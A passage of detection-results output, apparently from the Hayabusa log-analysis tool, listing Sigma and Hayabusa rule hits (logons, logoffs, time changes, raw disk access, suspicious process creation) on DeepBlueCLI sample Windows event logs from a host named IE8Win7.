| 219 | 2013-10-24 06:57:51.000 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 220 | 2013-10-24 07:00:55.356 +09:00 | IE8Win7 | 4647 | informational | Logoff - User Initiated | User: IEUser : LogonID: 0xdafc | rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 221 | 2013-10-24 07:00:55.903 +09:00 | IE8Win7 | 4634 | informational | Logoff | User: IEUser : LogonID: 0xdafc | rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 222 | 2013-10-24 07:00:55.903 +09:00 | IE8Win7 | 4634 | informational | Logoff | User: IEUser : LogonID: 0xdad4 | rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 223 | 2013-10-24 07:01:28.840 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : LogonID: 0x4bafc : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 224 | 2013-10-24 07:01:28.840 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : LogonID: 0x4bb14 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 225 | 2013-10-24 07:01:28.840 +09:00 | IE8Win7 | 4648 | informational | Explicit Logon | Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 226 | 2013-10-24 07:01:28.840 +09:00 | IE8Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0x4bafc | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 227 | 2013-10-24 07:04:16.809 +09:00 | IE8Win7 | 4647 | informational | Logoff - User Initiated | User: IEUser : LogonID: 0x4bb14 | rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 228 | 2013-10-24 07:05:00.218 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 229 | 2013-10-24 07:05:00.218 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 230 | 2013-10-24 07:05:21.859 +09:00 | IE8Win7 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 231 | 2013-10-24 07:05:31.000 +09:00 | IE8Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 232 | 2013-10-24 07:05:32.609 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : LogonID: 0xd99e : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 233 | 2013-10-24 07:05:32.609 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : LogonID: 0xd9c6 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 234 | 2013-10-24 07:05:32.609 +09:00 | IE8Win7 | 4648 | informational | Explicit Logon | Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 235 | 2013-10-24 07:05:32.609 +09:00 | IE8Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0xd99e | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 236 | 2013-10-24 07:05:36.944 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 237 | 2013-10-24 07:05:36.944 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 238 | 2013-10-24 07:05:36.944 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 239 | 2013-10-24 07:05:40.928 +09:00 | IE8Win7 | 4624 | informational | Logon Type 4 - Batch | User: IEUser : Workstation: IE8WIN7 : IP Address: - : LogonID: 0x144df | rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 240 | 2013-10-24 07:05:40.928 +09:00 | IE8Win7 | 4648 | informational | Explicit Logon | Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 241 | 2013-10-24 07:05:40.928 +09:00 | IE8Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0x144df | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 242 | 2013-10-24 07:08:00.000 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 243 | 2013-10-24 07:08:00.000 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 244 | 2013-10-24 07:10:10.631 +09:00 | IE8Win7 | 9 | medium | Raw Disk Access Using Illegitimate Tools | | rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 245 | 2013-10-24 08:11:15.779 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 246 | 2013-10-24 08:11:15.779 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 247 | 2013-10-24 08:11:15.779 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 248 | 2014-11-22 08:29:47.424 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 249 | 2014-11-22 08:29:47.424 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 250 | 2014-11-22 08:29:47.424 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 251 | 2014-11-22 08:29:47.424 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 252 | 2014-11-22 08:29:47.424 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 253 | 2014-11-22 08:29:47.424 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 254 | 2014-11-22 08:29:47.424 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 255 | 2014-11-22 08:29:47.517 +09:00 | IE8Win7 | 9 | medium | Raw Disk Access Using Illegitimate Tools | | rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 256 | 2014-11-22 08:30:12.392 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 257 | 2014-11-22 08:30:12.392 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 258 | 2014-11-22 08:32:12.657 +09:00 | IE8Win7 | 4634 | informational | Logoff | User: IEUser : LogonID: 0x144df | rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 259 | 2014-11-22 08:34:00.063 +09:00 | IE8Win7 | 4648 | informational | Explicit Logon | Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 260 | 2014-11-22 08:40:48.532 +09:00 | IE8Win7 | 4647 | informational | Logoff - User Initiated | User: IEUser : LogonID: 0xd9c6 | rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 261 | 2014-11-22 08:42:11.390 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 262 | 2014-11-22 08:42:11.390 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 263 | 2014-11-22 08:42:34.625 +09:00 | IE8Win7 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 264 | 2014-11-22 08:42:43.000 +09:00 | IE8Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 265 | 2014-11-22 08:42:49.610 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 266 | 2014-11-22 08:42:49.610 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 267 | 2014-11-22 08:42:49.610 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 268 | 2014-11-22 08:43:06.625 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : LogonID: 0x16559 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 269 | 2014-11-22 08:43:06.625 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : LogonID: 0x16589 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 270 | 2014-11-22 08:43:06.625 +09:00 | IE8Win7 | 4648 | informational | Explicit Logon | Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 271 | 2014-11-22 08:43:06.625 +09:00 | IE8Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0x16559 | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 272 | 2014-11-22 08:44:23.818 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 273 | 2014-11-22 08:44:23.818 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 274 | 2014-11-22 08:44:23.849 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 275 | 2014-11-22 08:45:01.000 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 276 | 2014-11-22 08:45:01.000 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 277 | 2014-11-22 09:44:32.677 +09:00 | IE8Win7 | 4647 | informational | Logoff - User Initiated | User: IEUser : LogonID: 0x16589 | rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 278 | 2014-11-24 14:07:11.015 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 279 | 2014-11-24 14:07:11.015 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 280 | 2014-11-24 14:07:26.562 +09:00 | IE8Win7 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 281 | 2014-11-24 14:07:38.000 +09:00 | IE8Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 282 | 2014-11-24 14:07:42.189 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 283 | 2014-11-24 14:07:42.189 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 284 | 2014-11-24 14:07:42.189 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 285 | 2014-11-24 14:08:08.126 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : LogonID: 0x2b7c0 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 286 | 2014-11-24 14:08:08.126 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : LogonID: 0x2b7f0 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 287 | 2014-11-24 14:08:08.126 +09:00 | IE8Win7 | 4648 | informational | Explicit Logon | Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 288 | 2014-11-24 14:08:08.126 +09:00 | IE8Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0x2b7c0 | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 289 | 2014-11-24 14:09:50.000 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 290 | 2014-11-24 14:09:50.000 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 291 | 2014-11-24 14:11:00.564 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 292 | 2014-11-24 14:11:00.564 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 293 | 2014-11-26 02:18:43.547 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 294 | 2014-11-26 02:18:43.547 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 295 | 2014-11-26 02:18:43.562 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 296 | 2014-11-26 02:25:02.877 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 297 | 2014-11-26 02:25:02.877 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 298 | 2014-11-26 02:25:02.877 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 299 | 2014-11-26 02:48:26.739 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 300 | 2014-11-26 02:48:26.739 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 301 | 2014-11-26 02:48:26.739 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 302 | 2014-11-26 02:57:33.848 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 303 | 2014-11-26 02:57:33.848 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 304 | 2014-11-26 02:57:33.848 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 305 | 2014-11-26 03:01:39.454 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 306 | 2014-11-26 03:01:39.454 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 307 | 2014-11-26 03:01:39.454 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 308 | 2014-11-26 03:02:36.847 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 309 | 2014-11-26 03:02:36.847 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 310 | 2014-11-26 03:02:36.847 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 311 | 2014-11-26 03:05:21.128 +09:00 | IE8Win7 | 9 | medium | Raw Disk Access Using Illegitimate Tools | | rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 312 | 2014-11-26 03:05:40.910 +09:00 | IE8Win7 | 4648 | informational | Explicit Logon | Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 313 | 2014-11-26 03:08:12.894 +09:00 | IE8Win7 | 9 | medium | Raw Disk Access Using Illegitimate Tools | | rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 314 | 2014-11-26 06:49:55.313 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 315 | 2014-11-26 06:49:55.313 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 316 | 2014-11-26 06:49:55.313 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 317 | 2014-11-26 06:50:49.109 +09:00 | IE8Win7 | 4647 | informational | Logoff - User Initiated | User: IEUser : LogonID: 0x2b7f0 | rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 318 | 2014-11-26 06:52:22.343 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 319 | 2014-11-26 06:52:22.343 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 320 | 2014-11-26 06:52:36.312 +09:00 | IE8Win7 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 321 | 2014-11-26 06:52:41.000 +09:00 | IE8WIN7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 322 | 2014-11-26 06:52:48.955 +09:00 | IE8Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 323 | 2014-11-26 06:52:48.955 +09:00 | IE8Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 324 | 2014-11-26 06:52:48.955 +09:00 | IE8Win7 | 4616 | medium | Unauthorized System Time Modification | | rules/sigma/builtin/security/win_susp_time_modification.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 325 | 2014-11-26 06:54:52.158 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : LogonID: 0xcf564 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 326 | 2014-11-26 06:54:52.158 +09:00 | IE8Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : LogonID: 0xcf598 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 327 | 2014-11-26 06:54:52.158 +09:00 | IE8Win7 | 4648 | informational | Explicit Logon | Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 328 | 2014-11-26 06:54:52.158 +09:00 | IE8Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0xcf564 | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
